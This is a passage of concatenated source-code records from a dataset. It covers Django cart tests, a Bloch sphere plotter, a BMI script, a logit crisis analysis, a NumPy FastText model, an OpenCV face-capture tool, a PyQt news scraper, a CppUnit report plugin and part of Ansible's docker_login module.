cart = cart_query.first()\n return cart\n\n\ndef get_or_create_user_cart(user):\n cart_query = Cart.objects.filter(user_id=user)\n if cart_query.count() == 0:\n cart = Cart(user_id=user)\n cart.save()\n else:\n cart = cart_query.first()\n return cart\n\n\ndef test_add_product():\n user = get_or_create_user()\n cart = get_or_create_user_cart(user)\n books = get_or_create_books(user, 5)\n\n book = books[0]\n\n body = {\n 'user': user\n }\n\n req = RequestFactory().post(\"/cart/\", body)\n guest = get_or_create_guest()\n req.COOKIES['device'] = guest.device\n req.user = user\n add_product(req, 'cart', book.ISBN)\n assert cart.books.filter(ISBN=book.ISBN).last().ISBN == book.ISBN\n\n\ndef test_delete_product():\n user = get_or_create_user()\n cart = get_or_create_user_cart(user)\n books = get_or_create_books(user, 5)\n\n book = books[0]\n\n body = {\n 'user': user\n }\n\n req = RequestFactory().post(\"/cart/\", body)\n guest = get_or_create_guest()\n req.COOKIES['device'] = guest.device\n req.user = user\n delete_product(req, book)\n assert cart.books.filter(ISBN=book.ISBN).last() is None\n\n\ndef test_add_product_guest():\n guest = get_or_create_guest()\n cart = get_or_create_guest_cart(guest)\n user = get_or_create_user()\n books = get_or_create_books(user, 5)\n\n book = books[0]\n\n body = {}\n\n req = RequestFactory().post(\"/cart/\", body)\n req.COOKIES['device'] = guest.device\n req.user = None\n add_product(req, 'cart', book.ISBN)\n assert cart.books.filter(ISBN=book.ISBN).last().ISBN == book.ISBN\n\n\ndef test_delete_product_guest():\n guest = get_or_create_guest()\n cart = get_or_create_guest_cart(guest)\n user = User()\n books = get_or_create_books(user, 5)\n\n book = books[0]\n\n body = {}\n\n req = RequestFactory().post(\"/cart/\", body)\n req.COOKIES['device'] = guest.device\n req.user = None\n delete_product(req, book)\n assert cart.books.filter(ISBN=book.ISBN).last() is None\n\n\ndef push_some_products(user):\n cart = Cart.objects.get(user_id=user)\n books = Book.objects.all()\n cart.books.add(books[0])\n cart.books.add(books[1])\n cart.save()\n return books[0].price + books[1].price\n\n\ndef get_or_create_user_bank_account(user):\n bank_query = BankAccount.objects.filter(user=user)\n if bank_query.count() == 0:\n user_bank_account = BankAccount(user=user)\n user_bank_account.save()\n else:\n user_bank_account = bank_query.first()\n return user_bank_account\n\n\ndef test_complete_purchase():\n user = create_user(random_user=True)\n total_price = push_some_products(user)\n user_bank_account = get_or_create_user_bank_account(user)\n user_bank_account.save()\n\n body = {\n 'user': user, 'username': 'User Name Test', 'month_exp': 11, 'year_exp': 2021, 'cardNumber': '1234567890123456',\n 'cvv': 111, 'redeemed_codes': 0\n }\n\n req = RequestFactory().post(\"/payment/\", body)\n req.test = True\n # La Request Factory no pilla el middleware, s'ha d'afegir manualment\n # (es necessita pel complete_purchase)\n middleware = SessionMiddleware()\n middleware.process_request(req)\n req.session.save()\n req.user = user\n cart = Cart.objects.get(user_id=user)\n complete_purchase(request=req, kwarg=True)\n bill = Bill.objects.filter(user_id=user).last()\n\n req2 = RequestFactory().post(\"/pdf/\")\n req2.user = user\n generate_pdf(req2)\n user_bank_account = get_or_create_user_bank_account(user)\n assert cart.books.count() == 0 and user_bank_account.cvv == 111 and bill.total_money_spent == total_price\n\n\nclass SimpleTest(unittest.TestCase):\n def test_context(self):\n factory = RequestFactory()\n request = factory.get('/payment')\n request.user = create_user(random_user=True)\n response = PaymentView.as_view()(request)\n self.assertIsInstance(response.context_data, dict)\n self.assertEqual(response.context_data['total_items'], 0)\n","sub_path":"books/test/test_buy.py","file_name":"test_buy.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"277387048","text":"# Written by Akel Hashim.\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\n\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n \"\"\"Class for drawing a 3D arrow.\n :param xs:\n :type xs:\n :param ys:\n :type ys:\n :param zs:\n :type zs:\n :param args:\n :type args:\n :param kwargs:\n :type kwargs:\n \"\"\"\n FancyArrowPatch.__init__(self, (0, 0), (0, 0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0], ys[0]), (xs[1], ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\n\nclass BlochSphere:\n\n def __init__(self,\n figsize=(10, 10),\n label_fontsize=35,\n tick_label_fontsize=20,\n point_size=60,\n point_alpha=1.0,\n show_background_grid=True,\n show_background=True,\n rotation_angle=45):\n \"\"\"\n Class for plotting points and vectors on the Bloch Sphere.\n :param figsize: figure size for Bloch Sphere (default: (10,10))\n :type figsize: tuple\n :param label_fontsize: fontsize for x-, y-, z-labels (default: 35)\n :type label_fontsize: int\n :param tick_label_fontsize: fontsize for x-, y-, z-ticks (default: 20)\n :type tick_label_fontsize: int\n :param point_size: point size for scatter plots\n :type point_size: int\n :param point_alpha: opacity for points in scatter plots\n :type point_alpha: float\n :param show_background_grid: display x, y, z grids behind Bloch sphere\n :type show_background_grid: bool\n :param show_background: display background behind Bloch sphere\n :type show_background: bool\n :param rotation_angle: angle about the z-axis to rotate the Bloch sphere for viewing\n :type rotation_angle: int\n \"\"\"\n\n self.figsize = figsize\n self.label_fontsize = label_fontsize\n self.tick_label_fontsize = tick_label_fontsize\n self.point_size = point_size\n self.point_alpha = point_alpha\n self.show_background_grid = show_background_grid\n self.show_background = show_background\n self.rotation_angle = rotation_angle\n\n self.fig = None\n\n def draw_bloch_sphere(self):\n \"\"\"Draws an empty Bloch sphere.\"\"\"\n phi = np.linspace(0, 2 * np.pi, 50)\n theta = np.linspace(0, np.pi, 50)\n PHI, THETA = np.meshgrid(phi, theta)\n\n x_sphere = np.sin(PHI) * np.cos(THETA)\n y_sphere = np.sin(PHI) * np.sin(THETA)\n z_sphere = np.cos(PHI)\n\n self.fig = plt.figure(figsize=self.figsize)\n self.ax = plt.axes(projection='3d')\n self.ax.plot_wireframe(x_sphere, y_sphere, z_sphere, rstride=1, cstride=1, color='k', alpha=0.1, linewidth=1)\n self.ax.plot([-1, 1], [0, 0], [0, 0], c='k', alpha=0.5)\n self.ax.plot([0, 0], [-1, 1], [0, 0], c='k', alpha=0.5)\n self.ax.plot([0, 0], [0, 0], [-1, 1], c='k', alpha=0.5)\n self.ax.plot(np.cos(phi), np.sin(phi), 0, c='k', alpha=0.5)\n self.ax.plot(np.zeros(50), np.sin(phi), np.cos(phi), c='k', alpha=0.5)\n self.ax.plot(np.sin(phi), np.zeros(50), np.cos(phi), c='k', alpha=0.5)\n self.ax.set_xlabel(r'$\\langle x \\rangle$', fontsize=self.label_fontsize)\n self.ax.set_ylabel(r'$\\langle y \\rangle$', fontsize=self.label_fontsize)\n self.ax.set_zlabel(r'$\\langle z \\rangle$', fontsize=self.label_fontsize)\n self.ax.set_xlim(-1, 1)\n self.ax.set_ylim(-1, 1)\n self.ax.set_zlim(-1, 1)\n self.ax.set_xticklabels(['-1', '', '', '', '', '', '', '', '1'], fontsize=self.tick_label_fontsize)\n self.ax.set_yticklabels(['-1', '', '', '', '', '', '', '', '1'], fontsize=self.tick_label_fontsize)\n self.ax.set_zticklabels(['-1', '', '', '', '', '', '', '', '1'], fontsize=self.tick_label_fontsize)\n self.ax.set_facecolor('white')\n self.ax.grid(self.show_background_grid, color='k')\n if self.show_background is False:\n self.ax.set_axis_off()\n if self.rotation_angle is not None:\n self.ax.view_init(30, self.rotation_angle)\n\n def add_points(self, points, color=None):\n \"\"\"Adds points to the Bloch sphere.\n :param points: [x, y, z] coordinates for a point\n Each can be an individual list of multiple coordinates for multiple points.\n :type points: list|np.array\n :param color: color of points for scatter point (default: None)\n :type color: None|str|RGB\n \"\"\"\n \"\"\"Add points to the Bloch Sphere.\"\"\"\n if self.fig is None:\n self.draw_bloch_sphere()\n\n x, y, z = points\n if color is None:\n self.ax.scatter3D(x, y, z, s=self.point_size, alpha=self.point_alpha)\n else:\n self.ax.scatter3D(x, y, z, s=self.point_size, alpha=self.point_alpha, color=color)\n\n def add_vector(self, vector, color=None):\n \"\"\"Add a vector to the Bloch sphere.\n :param vector: [x, y, z] coordinates for the tip of a vector\n :type vector: list|np.array\n :param color: color of vector (default: None)\n :type color: None|str|RGB\n :return:\n :rtype:\n \"\"\"\n \"\"\"Add points to the Bloch Sphere.\"\"\"\n if self.fig is None:\n self.draw_bloch_sphere()\n\n x, y, z = vector\n if color is None:\n p = self.ax.plot([0, x], [0, y], [0, z], linewidth=3)\n a = Arrow3D([0, x], [0, y], [0, z], mutation_scale=35, arrowstyle='-|>', color=p[0].get_color())\n else:\n self.ax.plot([0, x], [0, y], [0, z], linewidth=3, color=color)\n a = Arrow3D([0, x], [0, y], [0, z], mutation_scale=35, arrowstyle='-|>', color=color)\n self.ax.add_artist(a)\n\n def show(self, save=False, directory=None, filename=None):\n \"\"\"Plot the Bloch Sphere in a figure.\n :param save: save the figure (default: False\n :type save: bool\n :param directory: directory in which the save the figure (default: None)\n If None, it will save in the current directory.\n :type directory: None|str\n :param filename: string to prepend in front for 'Bloch_sphere.png' for a filename\n :type filename: None|str\n \"\"\"\n if self.fig is None:\n self.draw_bloch_sphere()\n plt.tight_layout()\n if save is True:\n plt.savefig(f'{directory}{filename}Bloch_sphere.png', dpi=300)\n plt.show()","sub_path":"pypulse/visualization/bloch.py","file_name":"bloch.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101627959","text":"def bmi_calc():\r\n num_cases = int(input())\r\n cases = map(lambda case: [float(case) for case in input().split()], range(num_cases))\r\n bmi_cases = map(lambda case: round(case[0] / pow(case[1], 2), 2), cases)\r\n result = []\r\n for bmi in bmi_cases:\r\n if bmi < 18.5:\r\n result.append('under')\r\n elif bmi < 25:\r\n result.append('normal')\r\n elif bmi < 30:\r\n result.append('over')\r\n else:\r\n result.append('obese')\r\n print(\" \".join(result))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n bmi_calc()\r\n","sub_path":"code_abbey/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261761952","text":"# The code below imports a few packages we will need for this analysis\nimport pandas as pd\nimport numpy as np\nimport pylab as pl\nimport statsmodels.api as sm\n\n# load the data\ndf = pd.read_csv(\"african_crises.csv\")\n# check out the first 5 rows of the dataset\n# print(df.head())\n# summarize the data\n# print(df.describe())\n\n# let several parameters become dummy\ndummy_domestic = pd.get_dummies(df[\"domestic_debt_in_default\"], prefix=\"domestic_debt_in_default\")\ndummy_sovereign = pd.get_dummies(df[\"sovereign_external_debt_default\"], prefix=\"sovereign_external_debt_default\")\ndummy_independence = pd.get_dummies(df[\"independence\"], prefix=\"independence\")\n# print(dummy_domestic,dummy_sovereign,dummy_independence)\n\n# create a clean data frame for the regression\ncols_to_keep = [\"systemic_crisis\", \"currency_crises\", \"inflation_crises\", \"banking_crisis\", \"exch_usd\", \"gdp_weighted_default\", \"inflation_annual_cpi\"]\ndata = df[cols_to_keep].join(dummy_domestic.loc[:,: \"domestic_debt_in_default_0\"]).join(dummy_sovereign.loc[:,: \"sovereign_external_debt_default_0\"]).join(dummy_independence.loc[:,: \"independence_0\"])\n# print(data.head())\n\n# manually add the intercept\ndata[\"intercept\"] = 1.0\n\n# extract independent variables\ntrain_cols = data.columns[4:]\n# print(train_cols)\n\n# fit the binary logit model\nlogit = sm.Logit(data[\"systemic_crisis\"], data[train_cols])\nresult = logit.fit()\n\n# display the results\nprint(result.summary())\n# odds ratios only\n# print(np.exp(result.params))\ni = int(input(\"Please input the number you want to analyze:\"))\nsystemic_crisis_Xib = result.params[6] + result.params[0] * data[\"exch_usd\"][i] + result.params[1] * data[\"gdp_weighted_default\"][i] \\\n + result.params[4] * data[\"sovereign_external_debt_default_0\"][i] + result.params[5] * data[\"independence_0\"][i]\nprint(np.exp(systemic_crisis_Xib)/(1 + np.exp(systemic_crisis_Xib))**2)\n# print(1/(1 + np.exp(-systemic_crisis_Xib)))\n\n# the same display with different dependent variable\nlogit = sm.Logit(data[\"currency_crises\"], data[train_cols])\nresult = logit.fit()\nprint(result.summary())\n# print(np.exp(result.params))\nlogit = sm.Logit(data[\"inflation_crises\"], data[train_cols])\nresult = logit.fit()\nprint(result.summary())\n# print(np.exp(result.params))\nlogit = sm.Logit(data[\"banking_crisis\"], data[train_cols])\nresult = logit.fit()\nprint(result.summary())\n# print(np.exp(result.params))","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"320175672","text":"import numpy as np\nimport copy\n\nclass FastText_Classifier:\n def __init__(self, config, args):\n data_info = config.data_info[args.dataset]\n\n if args.ngram ==1:\n self.vocab_size = data_info.vocab_size_1\n else:\n self.vocab_size = data_info.vocab_size_2\n self.batch_size = config.train.batch_size\n\n self.hidden = config.train.hidden\n self.n_classes = data_info.classes\n\n self.W_in = 0.1 * np.random.randn(self.vocab_size, self.hidden)\n self.W_in[0] = 0 # padding value == 0\n self.W_out = np.random.randn(self.hidden, self.n_classes)\n self.b = np.random.randn(self.n_classes)\n\n def forward(self, x, label): # (batch_size, sentence_max_len)\n self.t = label\n self.x = x\n self.sum_sentence_vec = np.mean(self.W_in[x], axis=1) # (batch_size, sentence_max_len, hidden_size) -> (batch_size, hidden_size)\n output = np.dot(self.sum_sentence_vec, self.W_out) + self.b #(batch_size, n_classes)\n output = softmax(output)\n self.grad = copy.deepcopy(output)\n\n # accuracy\n y = np.argmax(output, axis=1) # (batch_size, )\n accuracy = len(y[y ==self.t])/len(y) * 100\n\n # loss\n loss = -np.sum(np.log(output[np.arange(len(self.t)), self.t]+1e-7))/len(self.t)\n return loss, accuracy\n\n def backward(self, learning_rate):\n self.grad[np.arange(len(self.t)), self.t] -= 1 # softmaxwithloss\n self.grad /= len(self.t)\n self.b -= learning_rate * np.sum(self.grad, axis=0)\n d_W_in_x = np.expand_dims(np.dot(self.grad, self.W_out.T), axis=1)\n self.W_out -= learning_rate * np.dot(self.sum_sentence_vec.T , self.grad)\n self.W_in[self.x] -= learning_rate * d_W_in_x\n self.W_in[0] = 0 # padding vector -> update xxx !\n return None\n\ndef softmax(x):\n max_ = np.max(x, axis=1, keepdims=True)\n exp_x = np.exp(x-max_)\n #exp_x = np.exp(x)\n exp_x_sum = np.sum(exp_x, axis=1, keepdims=True)\n return exp_x/exp_x_sum\n\n\n\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"568845291","text":"from tkinter import *\nfrom tkinter import messagebox\nimport cv2\nimport os\nfrom PIL import Image\nimport numpy as np\nimport mysql.connector\nfrom db_connect import *\n\nclass digiFaceTeacher1:\n def __init__(self,sal,tName,tID):\n self.tName = tName\n self.tID = tID\n self.sal = sal\n self.gui_1()\n\n def genDataset(self):\n mycursor = connection.cursor()\n mycursor.execute(\"SELECT * from digiFaceTeacher\")\n myresult = mycursor.fetchall()\n id = 1\n for x in myresult:\n id += 1\n sql = 'INSERT INTO digiFaceTeacher values(\"{}\",\"{}\",\"{}\",\"{}\")'.format(id, self.sal, self.tName, self.tID)\n mycursor.execute(sql)\n connection.commit()\n face_classifier = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\n def face_cropped(img):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray, 1.3, 5)\n # scaling factor=1.3\n # Minimum neighbor = 5\n\n if faces is ():\n return None\n for (x, y, w, h) in faces:\n cropped_face = img[y:y + h, x:x + w]\n return cropped_face\n\n cap = cv2.VideoCapture(0)\n img_id = 0\n\n while True:\n ret, frame = cap.read()\n if face_cropped(frame) is not None:\n img_id += 1\n face = cv2.resize(face_cropped(frame), (200, 200))\n face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)\n file_name_path = \"dataTeacher/user.\" + str(id) + \".\" + str(img_id) + \".jpg\"\n cv2.imwrite(file_name_path, face)\n cv2.putText(face, str(img_id), (50, 50), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)\n # (50,50) is the origin point from where text is to be written\n # font scale=1\n # thickness=2\n\n cv2.imshow(\"Cropped face\", face)\n if cv2.waitKey(1) == 13 or int(img_id) == 200:\n break\n cap.release()\n cv2.destroyAllWindows()\n #messagebox.showinfo('Result', 'Generating dataset completed!!!')\n\n def trainData(self):\n data_dir = \"C:\\\\Users\\\\krite\\\\PycharmProjects\\\\DigiCollege\\\\dataTeacher\"\n path = [os.path.join(data_dir, f) for f in os.listdir(data_dir)]\n faces = []\n ids = []\n\n for image in path:\n img = Image.open(image).convert('L');\n imageNp = np.array(img, 'uint8')\n id = int(os.path.split(image)[1].split(\".\")[1])\n\n faces.append(imageNp)\n ids.append(id)\n ids = np.array(ids)\n\n # Train the classifier and save\n clf = cv2.face.LBPHFaceRecognizer_create()\n clf.train(faces, ids)\n clf.write(\"classifier.xml\")\n #messagebox.showinfo('Result', 'Training dataset completed!!!')\n\n def gui_1(self):\n self.genDataset()\n self.trainData()\n\n messagebox.showinfo(\"Done\", \"DigiFace has been setup successfully\")\n","sub_path":"digiFaceTeacher.py","file_name":"digiFaceTeacher.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"428606531","text":"import datetime\nimport os\nimport sys\nfrom selenium import webdriver\nimport webbrowser\nfrom PyQt5.QtGui import QStandardItemModel\nfrom PyQt5.QtWidgets import *\n\n\nclass Form(QWidget):\n def __init__(self):\n super(Form, self).__init__()\n\n self.setWindowTitle(\"뉴스기사 검색 프로그램\")\n\n self.lst = []\n self.href = []\n self.page = 1\n cd = \"{}\\chromedriver\".format(os.path.dirname(os.path.realpath(__file__)))\n chOpt = webdriver.ChromeOptions()\n chOpt.add_argument(\"headless\")\n chOpt.add_argument(\"lang=ko_KR\")\n self.driver = webdriver.Chrome(cd, chrome_options=chOpt)\n\n self.lnKeyword = QLineEdit(\"파이썬\")\n\n self.rdSort_0 = QRadioButton(\"관련도\")\n self.rdSort_1 = QRadioButton(\"최신\")\n self.rdSort_2 = QRadioButton(\"오래된\")\n hbSort = QHBoxLayout()\n hbSort.addWidget(self.rdSort_0)\n hbSort.addWidget(self.rdSort_1)\n hbSort.addWidget(self.rdSort_2)\n grpSort = QGroupBox()\n grpSort.setLayout(hbSort)\n\n self.rdType_0 = QRadioButton(\"전체\")\n self.rdType_1 = QRadioButton(\"동영상\")\n self.rdType_2 = QRadioButton(\"포토\")\n self.rdType_3 = QRadioButton(\"지면기사\")\n hbType = QHBoxLayout()\n hbType.addWidget(self.rdType_0)\n hbType.addWidget(self.rdType_1)\n hbType.addWidget(self.rdType_2)\n hbType.addWidget(self.rdType_3)\n grpType = QGroupBox()\n grpType.setLayout(hbType)\n\n self.rdField_0 = QRadioButton(\"전체\")\n self.rdField_1 = QRadioButton(\"제목만\")\n hbFeild = QHBoxLayout()\n hbFeild.addWidget(self.rdField_0)\n hbFeild.addWidget(self.rdField_1)\n grpFeild = QGroupBox()\n grpFeild.setLayout(hbFeild)\n\n self.rdDate_0 = QRadioButton(\"전체\")\n self.rdDate_1 = QRadioButton(\"1일\")\n self.rdDate_2 = QRadioButton(\"1주\")\n self.rdDate_3 = QRadioButton(\"1개월\")\n self.rdDate_4 = QRadioButton(\"6개월\")\n self.rdDate_5 = QRadioButton(\"1년\")\n self.rdDate_6 = QRadioButton(\"선택\")\n self.dtStart = QDateEdit(datetime.date.today())\n self.dtEnd = QDateEdit(datetime.date.today())\n hbDate_0 = QHBoxLayout()\n hbDate_0.addWidget(self.rdDate_0)\n hbDate_0.addWidget(self.rdDate_1)\n hbDate_0.addWidget(self.rdDate_2)\n hbDate_1 = QHBoxLayout()\n hbDate_1.addWidget(self.rdDate_3)\n hbDate_1.addWidget(self.rdDate_4)\n hbDate_1.addWidget(self.rdDate_5)\n frmDateCustom = QFormLayout()\n frmDateCustom.addRow(\"시작: \", self.dtStart)\n frmDateCustom.addRow(\"종료: \", self.dtEnd)\n hbDate_2 = QHBoxLayout()\n hbDate_2.addWidget(self.rdDate_6)\n hbDate_2.addLayout(frmDateCustom)\n vbDate = QVBoxLayout()\n vbDate.addLayout(hbDate_0)\n vbDate.addLayout(hbDate_1)\n vbDate.addLayout(hbDate_2)\n grpDate = QGroupBox()\n grpDate.setLayout(vbDate)\n\n frm = QFormLayout()\n frm.addRow(\"검색어:\", self.lnKeyword)\n frm.addRow(\"정렬기준: \", grpSort)\n frm.addRow(\"기사유형: \", grpType)\n frm.addRow(\"검색범위: \", grpFeild)\n frm.addRow(\"검색기간: \", grpDate)\n\n self.model = QStandardItemModel(0, 1, self)\n self.model.setHorizontalHeaderLabels([\"기사 제목\"])\n self.table = QTableView()\n self.table.setModel(self.model)\n self.table.setColumnWidth(0, 450)\n self.table.setFixedSize(450, 350)\n self.btnNext = QPushButton(\"다음\")\n self.btnPrev = QPushButton(\"이전\")\n self.btnSearch = QPushButton(\"검색\")\n\n hbPageCnt = QHBoxLayout()\n hbPageCnt.addWidget(self.btnSearch)\n hbPageCnt.addStretch()\n hbPageCnt.addWidget(self.btnPrev)\n hbPageCnt.addWidget(self.btnNext)\n vbList = QVBoxLayout()\n vbList.addLayout(hbPageCnt)\n vbList.addWidget(self.table)\n\n hbMain = QHBoxLayout()\n hbMain.addLayout(frm)\n hbMain.addLayout(vbList)\n\n self.setLayout(hbMain)\n\n self.rdSort_0.toggle()\n self.rdType_0.toggle()\n self.rdField_0.toggle()\n self.rdDate_0.toggle()\n\n self.btnSearch.clicked.connect(self.searchNews)\n self.btnNext.clicked.connect(self.lstNext)\n self.table.clicked.connect(self.select)\n def lstNext(self):\n self.page += 10\n self.searchNews()\n\n def lstPrev(self):\n if self.page > 1:\n self.page -= 10\n self.searchNews()\n\n def closeEvent(self, QCloseEvent):\n self.driver.close()\n\n def searchNews(self):\n if self.sender().text() == \"검색\":\n self.page = 1\n if self.rdSort_0.isChecked():\n sort = \"&sort=0\"\n if self.rdSort_1.isChecked():\n sort = \"&sort=1\"\n if self.rdSort_2.isChecked():\n sort = \"&sort=2\"\n if self.rdType_0.isChecked():\n ntype = \"&photo=0\"\n if self.rdType_1.isChecked():\n ntype = \"&photo=1\"\n if self.rdType_2.isChecked():\n ntype = \"&photo=2\"\n if self.rdType_3.isChecked():\n ntype = \"&photo=3\"\n if self.rdField_0.isChecked():\n feild = \"&field=0\"\n if self.rdField_1.isChecked():\n feild = \"&field=1\"\n\n url = \"https://search.naver.com/search.naver?where=news&query=\" \\\n + self.lnKeyword.text() + sort + ntype + feild + \"&start={}\".format(self.page)\n self.driver.get(url)\n print(url)\n self.lst = self.driver.find_elements_by_class_name(\"_sp_each_title\")\n self.apply_lst()\n\n def apply_lst(self):\n self.href.clear()\n self.model.removeRows(0, self.model.rowCount())\n self.model.setRowCount(len(self.lst))\n self.model.setVerticalHeaderLabels(['' for i in range(len(self.lst))])\n for idx, pre in enumerate(self.lst):\n self.model.setData(self.model.index(idx, 0), pre.text)\n self.href.append(pre.get_attribute(\"href\"))\n\n def select(self, e):\n webbrowser.open(self.href[e.row()])\n\n\napp = QApplication([])\nform = Form()\nform.show()\nsys.exit(app.exec_())","sub_path":"PyQT/Naver_News_Pyqt.py","file_name":"Naver_News_Pyqt.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"377741033","text":"import os\nimport os.path\nimport re\n\ndef get_config(branch):\n class Config:\n dirname = os.path.join(r\"C:\\Users\\ezhechn\\workspace\\sqrdata\\data\\cppunit\", branch.name, 'logs')\n return Config\n\ndef get_html(config, component, raw, old_raw, rank, old_rank):\n return str(raw)\n\ndef get_rank(config, component, raw):\n success, total = raw\n if total == -1: return 0.0\n\n Y_point = 5.0 if success == total else 1.0\n\n loc = component.line_of_code\n X_point = 1.0\n steps = [(1, 0.1), (loc/200, 0.4), (loc/200+1, 0.6), (loc/100, 0.8), (loc/100+1, 1)]\n for step in steps:\n if total >= step[0]:\n X_point = step[1]\n\n return X_point * Y_point\n\ndef get_latest_filename(filedir):\n files = os.listdir(filedir)\n latest_mtime = -1\n for f in files:\n mtime = os.path.getmtime(os.path.join(filedir, f))\n if mtime > latest_mtime:\n latest_mtime = mtime\n latest_filename = f\n\n return latest_filename\n\ndef get_raw(config, component):\n filename = get_latest_filename(config.dirname)\n filename = os.path.join(config.dirname, filename, \"cppunit\", \"fdsfsc.html\")\n\n#guidriver000000\n#ifdriver575700100 %0\n with open(filename) as f:\n pattern = ']*>(]*>)?%s()?(\\d+)(\\d+)' % component.name\n m = re.search(pattern, f.read())\n total = int(m.group(3))\n success = int(m.group(4))\n return success, total\n\n","sub_path":"src/new_plugins/cppunit.py","file_name":"cppunit.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"212488564","text":"#!/usr/bin/python\n#\n# (c) 2016 Olaf Kilian \n# Chris Houseknecht, \n# James Tanner, \n#\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: docker_login\nshort_description: Log into a Docker registry.\nversion_added: \"2.0\"\ndescription:\n - Provides functionality similar to the \"docker login\" command.\n - Authenticate with a docker registry and add the credentials to your local Docker config file. Adding the\n credentials to the config files allows future connections to the registry using tools such as Ansible's Docker\n modules, the Docker CLI and Docker SDK for Python without needing to provide credentials.\n - Running in check mode will perform the authentication without updating the config file.\noptions:\n registry_url:\n description:\n - The registry URL.\n type: str\n default: \"https://index.docker.io/v1/\"\n aliases:\n - registry\n - url\n username:\n description:\n - The username for the registry account.\n - Required when I(state) is C(present).\n type: str\n password:\n description:\n - The plaintext password for the registry account.\n - Required when I(state) is C(present).\n type: str\n email:\n description:\n - \"The email address for the registry account.\"\n type: str\n reauthorize:\n description:\n - Refresh existing authentication found in the configuration file.\n type: bool\n default: no\n aliases:\n - reauth\n config_path:\n description:\n - Custom path to the Docker CLI configuration file.\n type: path\n default: ~/.docker/config.json\n aliases:\n - dockercfg_path\n state:\n version_added: '2.3'\n description:\n - This controls the current state of the user. C(present) will login in a user, C(absent) will log them out.\n - To logout you only need the registry server, which defaults to DockerHub.\n - Before 2.1 you could ONLY log in.\n - Docker does not support 'logout' with a custom config file.\n type: str\n default: 'present'\n choices: ['present', 'absent']\n\nextends_documentation_fragment:\n - docker\n - docker.docker_py_1_documentation\nrequirements:\n - \"L(Docker SDK for Python,https://docker-py.readthedocs.io/en/stable/) >= 1.8.0 (use L(docker-py,https://pypi.org/project/docker-py/) for Python 2.6)\"\n - \"Docker API >= 1.20\"\n - \"Only to be able to logout, that is for I(state) = C(absent): the C(docker) command line utility\"\nauthor:\n - Olaf Kilian (@olsaki) \n - Chris Houseknecht (@chouseknecht)\n'''\n\nEXAMPLES = '''\n\n- name: Log into DockerHub\n docker_login:\n username: docker\n password: rekcod\n\n- name: Log into private registry and force re-authorization\n docker_login:\n registry: your.private.registry.io\n username: yourself\n password: secrets3\n reauthorize: yes\n\n- name: Log into DockerHub using a custom config file\n docker_login:\n username: docker\n password: rekcod\n config_path: /tmp/.mydockercfg\n\n- name: Log out of DockerHub\n docker_login:\n state: absent\n'''\n\nRETURN = '''\nlogin_results:\n description: Results from the login.\n returned: when state='present'\n type: dict\n sample: {\n \"email\": \"testuer@yahoo.com\",\n \"serveraddress\": \"localhost:5000\",\n \"username\": \"testuser\"\n }\n'''\n\nimport base64\nimport json\nimport os\nimport re\nimport traceback\n\ntry:\n from docker.errors import DockerException\nexcept ImportError:\n # missing Docker SDK for Python handled in ansible.module_utils.docker.common\n pass\n\nfrom ansible.module_utils._text import to_bytes, to_text\nfrom ansible.module_utils.docker.common import (\n AnsibleDockerClient,\n DEFAULT_DOCKER_REGISTRY,\n DockerBaseClass,\n EMAIL_REGEX,\n RequestException,\n)\n\n\nclass LoginManager(DockerBaseClass):\n\n def __init__(self, client, results):\n\n super(LoginManager, self).__init__()\n\n self.client = client\n self.results = results\n parameters = self.client.module.params\n self.check_mode = self.client.check_mode\n\n self.registry_url = parameters.get('registry_url')\n self.username = parameters.get('username')\n self.password = parameters.get('password')\n self.email = parameters.get('email')\n self.reauthorize = parameters.get('reauthorize')\n self.config_path = parameters.get('config_path')\n\n if parameters['state'] == 'present':\n self.login()\n else:\n self.logout()\n\n def fail(self, msg):\n self.client.fail(msg)\n\n def login(self):\n '''\n Log into the registry with provided username/password. On success update the config\n file with the new authorization.\n\n :return: None\n '''\n\n if self.email and not re.match(EMAIL_REGEX, self.email):\n self.fail(\"Parameter error: the email address appears to be incorrect. Expecting it to match \"\n \"/%s/\" % (EMAIL_REGEX))\n\n self.results['actions'].append(\"Logged into %s\" % (self.registry_url))\n self.log(\"Log into %s with username %s\" % (self.registry_url, self.username))\n try:\n response = self.client.login(\n self.username,\n password=self.password,\n email=self.email,\n registry=self.registry_url,\n reauth=self.reauthorize,\n 